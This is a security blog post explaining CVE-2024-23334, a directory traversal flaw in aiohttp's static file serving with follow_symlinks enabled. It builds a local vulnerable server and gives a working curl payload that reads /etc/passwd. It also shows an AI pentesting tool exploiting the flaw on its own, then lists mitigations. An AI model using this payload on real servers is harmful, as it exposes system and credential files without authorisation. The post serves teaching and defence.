CVE-2024-23334: A Deep Dive into aiohttp's Directory Traversal Vulnerability

2024-09-10
Kamran Hasan
CVE-2024-23334
CVE-2024-23334 exploit
Hack aiohttp
Hack python server
CVE-2024-23334 HackerGPT
Exploit using HackerGPT
HackerGPT proof of concept
CVE Exploitation
aiohttp vulnerability
LFI vulnerability
symlink attack
aiohttp security
aiohttp vulnerability exploitation
LFI attack mitigation
CVE-2024-23334: A Deep Dive into aiohttp's Directory Traversal Vulnerability

Understanding the Vulnerability

CVE-2024-23334, a critical vulnerability discovered in aiohttp, a popular asynchronous HTTP client/server framework for Python, exposes systems to potential directory traversal attacks. This vulnerability arises when aiohttp is used as a web server and static routes are configured without proper safeguards.

Directory traversal is a type of attack where an attacker attempts to access files or directories outside of the intended scope. In the context of aiohttp, this vulnerability allows an attacker to navigate beyond the configured static directory and potentially access sensitive files or even execute arbitrary code.

Root Cause and Impact

The root cause of this vulnerability lies in the way aiohttp handles static file serving when follow_symlinks is enabled. This setting allows aiohttp to follow symbolic links (symlinks) during file serving, which can be exploited by attackers to navigate to arbitrary locations on the system.

If an attacker can construct a malicious URL that leverages symlinks, they can potentially access files or directories that are normally restricted. This could lead to a range of consequences, including:

  • Data exfiltration: Sensitive data stored on the system, such as credentials, configuration files, or proprietary information, could be exposed.

  • Remote code execution: If the attacker can access executable files, they may be able to execute arbitrary code on the system, potentially gaining full control.

  • Denial of service: By consuming system resources or triggering errors, the attacker could disrupt the normal operation of the application or server.

Proof of Concept

Building a lab environment for CVE-2024-23334 is simple. We just need to install the vulnerable version of aiohttp and host a server that include static routes with follow_symlinks attribute set to True. We can use the python package manager to simply install it:

pip install aiohttp==3.9.1

Now the below mentioned simple python script is all we need to run to set up the aiohttp vulnerable server:

from aiohttp import web
import asyncio

async def index(request):
    return web.Response(text="CVE-2024-23334 Exploit")

async def main():
    app = web.Application()
    app.router.add_get('/', index)
    app.router.add_static('/static/',
                          path='static/',
                          follow_symlinks=True)

    runner = web.AppRunner(app)
    await runner.setup()
    site = web.TCPSite(runner, 'localhost', 8081)
    await site.start()
    print("Server started on http://localhost:8081")

if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
    loop.run_forever()
To run the above server, let's just do:
python server_file.py

This will get our aiohttp server up and running on port 8081 of localhost.

So now we have our target ready. It's time to perform the directory traversal attack to read files on the host server by exploiting CVE-2024-23334. This does not require any fancy exploitation, we will simply send a CURL request on server's /static endpoint with out malicious payload. The CURL would look like this if we would like to read the /etc/passwd file:

curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd"

Proof of Concept using HackerGPT

HackerGPT is an AI-powered Penetration Tester developed by White Hack Lab. It's an autonomous tool that we utilize to identify and exploit vulnerabilities in applications using a combination of generative AI methodologies.

Let's start with asking HackerGPT to perform a pentest on our target, that is http://localhost:8081

Just with that simple instruction, it was able to actually exploit this CVE-2024-23334 on our target and created the following report in markdown:

HackerGPT:  Based on the analysis, the target web application running on http://localhost:8081 is vulnerable to a path traversal attack. This vulnerability is outlined in CVE-2024-23334, which affects aiohttp servers configured with `follow_symlinks` enabled.

### Exploit Details

#### Example Exploit with CURL
```shell
curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd"
```

This CURL command allows an attacker to read the `/etc/passwd` file by exploiting the directory traversal vulnerability.

### Mitigation
To mitigate this vulnerability, the following steps should be taken:
1. **Disable `follow_symlinks`:** Ensure that `follow_symlinks` is set to `False`.
2. **Sanitize and validate URLs:** Implement robust sanitization and validation of user inputs
to prevent malicious URL constructions.

Here is the corrected, safer configuration:

```python
app.router.add_static('/static/', path='/path/to/static/files', follow_symlinks=False)
```

### Summary
The target web application is vulnerable to a path traversal attack due to improper
configuration of the aiohttp server. Immediate remediation steps should be taken to secure
the server by modifying the configuration and ensuring robust input validation.

Mitigation Strategies

To mitigate the risks posed by CVE-2024-23334, it is essential to implement the following strategies:

  • Upgrade to aiohttp 3.9.2 or later: This version of aiohttp includes a fix for the vulnerability.

  • Disable follow_symlinks: By disabling this setting, aiohttp will no longer follow symlinks during file serving, preventing attackers from exploiting the vulnerability.

  • Use a reverse proxy: A reverse proxy can be configured to handle static file requests, reducing the attack surface of the aiohttp application. This can be particularly effective in environments where multiple applications share the same web server.

Additional Considerations

  • Regular security audits: Conduct regular security audits to identify and address potential vulnerabilities, including those that may not be publicly known.

  • Input validation: Implement strict input validation to prevent malicious input from being processed by the application.

  • Least privilege principle: Ensure that applications and services run with the minimum necessary privileges to reduce the potential impact of a successful attack.

By following these guidelines, organizations can significantly reduce the risk of exploitation and protect their systems from the vulnerabilities associated with CVE-2024-23334.

CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure
CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure
2024-10-26
Kamran Hasan
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
2024-05-26
James McGill
CVE-2021-43798: Path Traversal in Grafana
CVE-2021-43798: Path Traversal in Grafana
2024-03-30
James McGill
CVE-2021-3129: Remote Code Execution in Laravel
CVE-2021-3129: Remote Code Execution in Laravel
2024-02-14
James McGill
CVE-2024-28116: Server-Side Template Injection in Grav CMS
CVE-2024-28116: Server-Side Template Injection in Grav CMS
2024-03-24
James McGill
CVE-2022-42889: Remote Code Execution in Apache Commons Text
CVE-2022-42889: Remote Code Execution in Apache Commons Text
2024-01-13
James McGill